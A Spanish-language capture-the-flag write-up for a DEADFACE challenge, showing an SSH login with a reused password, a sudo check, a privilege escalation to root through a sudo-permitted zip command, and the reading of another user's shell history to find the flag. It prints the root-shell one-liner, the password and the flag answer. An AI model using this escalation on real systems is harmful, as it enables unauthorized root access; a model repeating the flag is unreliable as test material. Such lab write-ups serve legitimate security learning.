C
C
CTF - Info/Codes/Notes
CTF WriteUps & Info/Codes/Notes Repo 2021
Search…
⌃K

Dead Men Tell No Tales

Problema

Created by: syyntax
We've discovered a remote system used by DEADFACE. We're not sure what the password is, but we know Donnell Aulner has an account on that machine. We believe DEADFACE has stored valuable information on this machine. The flag exists on the machine in the format flag{some-text-here}. Submit the flag as flag{flag-goes-here}.Username: dracula
deadmen.deadface.io:22

Solución

Utilizamos la password que obtuvimos en otro chall para ingresar con el usuario de drácula
Imagen de la flag con la password del user dracula
Con esto tenemos el user: dracula y la password: L3t_m3_in para ingresar
└─$ ssh [email protected] 1
[email protected]'s password:
[email protected]:~$ ls -lah /home
total 28K
drwxr-xr-x 1 root root 4.0K Sep 19 01:37 .
drwxr-xr-x 1 root root 4.0K Oct 18 04:02 ..
drwxr-xr-x 2 d34th d34th 4.0K Sep 19 01:37 d34th
drwxr-xr-x 1 dracula dracula 4.0K Sep 19 01:44 dracula
drwxr-xr-x 1 spookyboi spookyboi 4.0K Sep 19 01:39 spookyboi
[email protected]:/home$ cd /home/spookyboi/
[email protected]:/home/spookyboi$ ls -la
total 28
drwxr-xr-x 1 spookyboi spookyboi 4096 Sep 19 01:39 .
drwxr-xr-x 1 root root 4096 Sep 19 01:37 ..
-rw------- 1 spookyboi spookyboi 93 Sep 19 01:39 .bash_history
-rw-r--r-- 1 spookyboi spookyboi 220 Sep 19 01:37 .bash_logout
-rw-r--r-- 1 spookyboi spookyboi 3771 Sep 19 01:37 .bashrc
-rw-r--r-- 1 spookyboi spookyboi 807 Sep 19 01:37 .profile
[email protected]:/home/spookyboi$ cat .bash_history
cat: .bash_history: Permission denied
Encontramos un file interesante pero no tenemos permisos. Busquemos como escalar.
[email protected]:/home/spookyboi$ sudo -l
Matching Defaults entries for dracula on 3d468a1d2ddc:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dracula may run the following commands on 3d468a1d2ddc:
(ALL) NOPASSWD: /usr/bin/zip
Tiene permisos sudo a ZIP . escalemos permisos con el comando
sudo zip algo /etc/hosts -T -TT 'sh #'
[email protected]:/home/spookyboi$ sudo zip algo /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 34%)
# id
uid=0(root) gid=0(root) groups=0(root)
# /bin/bash
[email protected]:/home/spookyboi#
Ya somos Root!. Hora de ir a por mas info
[email protected]:/home/spookyboi# cat .bash_history
cd ~
echo "flag{c4c089cdbe222b9360880a07c987b581c6f51609}" > flag.txt
rm flag.txt
exit
exit
[email protected]:/home/spookyboi#
La flag se encontraba dentro del archivo.
flag{c4c089cdbe222b9360880a07c987b581c6f51609}
Last modified 1yr ago